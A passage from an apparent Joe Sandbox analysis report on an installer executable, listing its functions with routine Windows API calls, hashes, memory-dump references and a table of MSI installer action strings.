                                                                                                                                                                              • Opcode Fuzzy Hash: fc9c3770ff1350a2d644025c1313e9491fced6c14e69f17c577ac61358fdbbbb
                                                                                                                                                                              • Instruction Fuzzy Hash: E631CC70805649EFCB00DF69C94979EFBF4FF11710F1042AAD094A7A91DBB4AA08CB92
                                                                                                                                                                              Function 00D9817E Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,00DA100A,?,00000000,?,?,00DA12AB,?,00000007,?,?,00DA16FD,?,?), ref: 00D98194
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00DA100A,?,00000000,?,?,00DA12AB,?,00000007,?,?,00DA16FD,?,?), ref: 00D9819F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                              • Opcode ID: 52c3c11485acdcc773b6a3eb6da319ad0b5bcd0eed7e64bc4703f1331383e545
                                                                                                                                                                              • Instruction ID: 179bde353eb97df2427a7582f1aa36c344393f1270de2a0cffffb762fc6cc8a3
                                                                                                                                                                              • Opcode Fuzzy Hash: 52c3c11485acdcc773b6a3eb6da319ad0b5bcd0eed7e64bc4703f1331383e545
                                                                                                                                                                              • Instruction Fuzzy Hash: 95E08631500614EFCF213FA5BC087897BA9DB01791F144010F908B7065CE35D885D7B4
                                                                                                                                                                              Function 00CB49F0 Relevance: 2.6, APIs: 2, Instructions: 74COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00E172AC,000000FF,00000000,00000000,?,?,00E172AC,00CDEF15,InstanceId), ref: 00CB4A08
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00E172AC,000000FF,?,-00000001), ref: 00CB4A3A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 626452242-0
                                                                                                                                                                              • Opcode ID: 61d857cfc27adc6f2a9855de86762207d36dc65b5c58354833ceb465469be092
                                                                                                                                                                              • Instruction ID: 0135706a8e9c6e92b4524ffd996cab5d948b49ad2263f5e729fab813eed28243
                                                                                                                                                                              • Opcode Fuzzy Hash: 61d857cfc27adc6f2a9855de86762207d36dc65b5c58354833ceb465469be092
                                                                                                                                                                              • Instruction Fuzzy Hash: AF110236309211AFD6149B49DC98F6EB7A9EFC0721F20821EF225A72D1CB316D01DBA4
                                                                                                                                                                              Function 00D97F27 Relevance: 2.6, APIs: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00D85304,00BAA726,?,00000000,?,?,8007000E,00BAA59F), ref: 00D97F2B
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,8007000E,00BAA59F), ref: 00D97FCD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                              • Opcode ID: 567cd4d7642bc1dae57d7662fd9d8ea26a0151911b833a4d40612c8c19990ea3
                                                                                                                                                                              • Instruction ID: 0f9845604d57b5349fec519b4752e4be5bef585b6bd6dd7a3e0ed5886a887b9a
                                                                                                                                                                              • Opcode Fuzzy Hash: 567cd4d7642bc1dae57d7662fd9d8ea26a0151911b833a4d40612c8c19990ea3
                                                                                                                                                                              • Instruction Fuzzy Hash: C1112B3121E2016EDF013FFAACC5D2B669DEF057747240239F108B21A2EA118C089171
                                                                                                                                                                              Function 00D11BC0 Relevance: 1.7, APIs: 1, Instructions: 169synchronizationCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,02141699,?,?,?), ref: 00D11BF4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ObjectSingleWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 24740636-0
                                                                                                                                                                              • Opcode ID: ada95596a4cb90f5f0f4d4d3fdccd86d677c85aa79147d1221a4f3748004743f
                                                                                                                                                                              • Instruction ID: 70a113d3c8c53f9635ac930fe8d3e17430fcc6b0ae529707758cec8815416af3
                                                                                                                                                                              • Opcode Fuzzy Hash: ada95596a4cb90f5f0f4d4d3fdccd86d677c85aa79147d1221a4f3748004743f
                                                                                                                                                                              • Instruction Fuzzy Hash: F7517D79A00216DFCB04CF58E584BAAFBB1FF49710F2542A9E915AB351DB31ED41CBA0
                                                                                                                                                                              Function 00CD0DC0 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00CD1040: __Init_thread_footer.LIBCMT ref: 00CD10B6
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD0EA0
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionVariableWake
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 984842325-0
                                                                                                                                                                              • Opcode ID: c829fe7be4cda12bd64147cdd6128f730428545f085df7849c8705fd8ba0ec05
                                                                                                                                                                              • Instruction ID: c6802e6b591f3b0977a1d593eeee54765c6495b92994ebf7cca40dcf94c8a1b9
                                                                                                                                                                              • Opcode Fuzzy Hash: c829fe7be4cda12bd64147cdd6128f730428545f085df7849c8705fd8ba0ec05
                                                                                                                                                                              • Instruction Fuzzy Hash: F831EE79A40200DFD710DF05EC82B4AB7B1F70BB10F28861AE5616B7D0D3B67A48CB99
                                                                                                                                                                              Function 00BAAA70 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 33fe7d25e0cc96c3ed0a12f89334ed3fe19727c074e49c9e7485fea7b277b617
                                                                                                                                                                              • Instruction ID: 2c969ed9ee514651480f100fefedb90552f18efbb5e296907e474be5fbc06042
                                                                                                                                                                              • Opcode Fuzzy Hash: 33fe7d25e0cc96c3ed0a12f89334ed3fe19727c074e49c9e7485fea7b277b617
                                                                                                                                                                              • Instruction Fuzzy Hash: 04012972A48648AFC714CF54D941B26B7E8FB59B10F1082AEFC1997790DB36A910DA50
                                                                                                                                                                              Function 00CD1040 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 00CD114E
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 00CD1195
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 00CD11B4
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 00CD11E3
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 00CD1258
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD10B6
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalQuerySectionValue$EnterLeave$ConditionInit_thread_footerOpenVariableWake
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3563064969-0
                                                                                                                                                                              • Opcode ID: 9f2850d66d4e28f434359c9a9c912132062bb45eebf02e1c0d22cc962ccadad5
                                                                                                                                                                              • Instruction ID: f8e8516142909df72841f5a0fb096e39cbd4b5dd13fce6aa336f703a6bec7d2a
                                                                                                                                                                              • Opcode Fuzzy Hash: 9f2850d66d4e28f434359c9a9c912132062bb45eebf02e1c0d22cc962ccadad5
                                                                                                                                                                              • Instruction Fuzzy Hash: 9301F771B40644EFC310EB59DD02B19B3B4E70AB30F144326EE31AB3C0CA71BA048B52
                                                                                                                                                                              Function 00D99720 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000000,-00000010,00000000,00D97F74,00000001,00000364,-00000010,00000006,000000FF,?,00000000,?,?,8007000E,00BAA59F), ref: 00D99761
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              • Opcode ID: 82d5fe5a6fb8ce3f2e9117ed354ed7ee2087c37958bc13e90004c00493a209a0
                                                                                                                                                                              • Instruction ID: a348efbaa3341ea12f4806906a88e2338402ce45b70c28ab446868803f81fd9d
                                                                                                                                                                              • Opcode Fuzzy Hash: 82d5fe5a6fb8ce3f2e9117ed354ed7ee2087c37958bc13e90004c00493a209a0
                                                                                                                                                                              • Instruction Fuzzy Hash: DEF0E931530624ABEF213FEEAD11B9AB7C9EF41770B188019B805AB080DE20D80186F1
                                                                                                                                                                              Function 00BAA9B0 Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D81AEA: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,8000000B,02141699), ref: 00D81B4A
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateExceptionHeapRaise
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3789339297-0
                                                                                                                                                                              • Opcode ID: 5fd0abee46d2f5f5fc71d4809949b843425c9c797f7a976fcecd65448fe7b737
                                                                                                                                                                              • Instruction ID: 5437f2b4f79dd54f5ecbf7b461b5ed4637e998ac252313206926038e89d6ffab
                                                                                                                                                                              • Opcode Fuzzy Hash: 5fd0abee46d2f5f5fc71d4809949b843425c9c797f7a976fcecd65448fe7b737
                                                                                                                                                                              • Instruction Fuzzy Hash: FFF0A031A48248FFCB05DF54DC02F5ABBA8FB09B10F10866AF915926A0DB36A905CB64
                                                                                                                                                                              Function 00D981B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00D9FD0E,?,?,00D9FD0E,00000220,?,-00000010,?), ref: 00D981EA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              • Opcode ID: 521db3a427785005a7f0b02f6c09e8f821b93181b83c31bf0e2a578c74372568
                                                                                                                                                                              • Instruction ID: 5c82bb14a07e4482320f4377b985346d969833e9b1074cadfe471fe01d92cdef
                                                                                                                                                                              • Opcode Fuzzy Hash: 521db3a427785005a7f0b02f6c09e8f821b93181b83c31bf0e2a578c74372568
                                                                                                                                                                              • Instruction Fuzzy Hash: FFE0E5316017215ADF313B66AC00B5B3698DB03BA0F180120EC05B20D1DE10DC02A6F9

                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                              Function 00BA3000 Relevance: 464.5, Strings: 369, Instructions: 3218COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: #$ $$ +$ ,$ -$ -$ 6$ 7$ >$ ?$ @$( $(!$(($()$(*$(3$(4$(;$(<$(F$(G$0&$0'$00$01$08$09$0:$0C$0D$100$100$100$100$10000$10000$10000$100000$100000$12000$12000$12000$12000$12000$12000$12000$12000$12000$12000$12000$12000$12000$120000$120000$1500$1500$1500$1500$1500$15000$15000$15000$15000$15000$15000$15000$15000$1500000$1500000$1800$1800$1800$2000$2000$2000$2000$2000$2000$2000$2000$2000$20000$20000$200000$200000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$30000$30000$30000$30000$3000000$3000000$500$500$5000$5000$6000$6000$8"$8#$8$$8-$8.$800$800$8000$8000$8000$8000$8000$86$87$8@$8A$@ $@!$@*$@+$@2$@3$@4$@<$@=$@>$@E$@F$@G$AI_AppSearchEx$AI_ChainProductsPseudo$AI_CountRowAction$AI_DefaultActionCost$AI_DownloadPrereq$AI_ExtractPrereq$AI_Game$AI_Game$AI_Game$AI_GxInstall$AI_GxUninstall$AI_InstallPostPrerequisite$AI_InstallPrerequisite$AI_PreRequisite$AI_ProcessAccounts$AI_ProcessGroups$AI_ProcessTasks$AI_ScheduledTasks$AI_UninstallAccounts$AI_UninstallGroups$AI_UninstallTasks$AI_UserAccounts$AI_UserGroups$AI_XmlAttribute$AI_XmlElement$AI_XmlInstall$AI_XmlUninstall$AppId$AppId$AppId$AppSearch$BindImage$Complus$Complus$Complus$Component$Component_$CostFinalize$CostInitialize$CreateFolder$CreateFolders$CreateShortcuts$DuplicateFile$DuplicateFiles$Environment$Extension$Feature$Feature$Feature$Feature_$File$File$File$File$FileCost$FileSize$Font$Font$Font$H'$H($H/$H0$H1$H:$H;$HB$HC$HD$IniFile$IniFile$IniFile$InstallFiles$InstallFinalize$InstallInitialize$InstallODBC$InstallServices$InstallValidate$Location$MIME$MIME$MIME$MoveFile$MoveFiles$MsiAssembly$MsiConfigureServices$MsiPublishAssemblies$MsiUnpublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$Options$Options$Options$P$$P%$P-$P.$P7$P8$P@$PA$Patch$Patch$PatchFiles$PatchSize$ProcessComponents$ProgId$ProgId$ProgId$PublishComponent$PublishComponents$PublishFeatures$RegisterClassInfo$RegisterComPlus$RegisterExtensionInfo$RegisterFonts$RegisterMIMEInfo$RegisterProgIdInfo$RegisterTypeLibraries$Registry$RemoveDuplicateFiles$RemoveEnvironmentStrings$RemoveExistingProducts$RemoveFile$RemoveFiles$RemoveFolders$RemoveIniFile$RemoveIniValues$RemoveODBC$RemoveRegistry$RemoveRegistryValues$RemoveShortcuts$SelfReg$SelfReg$SelfReg$SelfRegModules$SelfUnregModules$ServiceControl$ServiceInstall$Shortcut$StartServices$StopServices$TypeLib$TypeLib$UnpublishComponents$UnpublishFeatures$UnregisterClassInfo$UnregisterComPlus$UnregisterExtensionInfo$UnregisterFonts$UnregisterMIMEInfo$UnregisterProgIdInfo$WriteEnvironmentStrings$WriteIniValues$WriteRegistryValues$X!$X"$X)$X*$X+$X4$X5$X<$X=$X>$XF$XG$`'$`($`1$`2$`9$`:$`;$`D$`E$h$$h%$h.$h/$h7$h8$hA$hB$p $p!$p"$p+$p,$p3$p4$p5$p=$p>$p?$pF$x($x)$x1$x2$x;$x<$xC$xD$xE$~$$$%$'$($,$-$.$0$1$7$8$:$;$?$@$A$B$C$D
                                                                                                                                                                              • API String ID: 0-2743806192
                                                                                                                                                                              • Opcode ID: 72c7cc3b463acab64f6c655f49d952de8263d78ef4701af80134809f56d03b0a
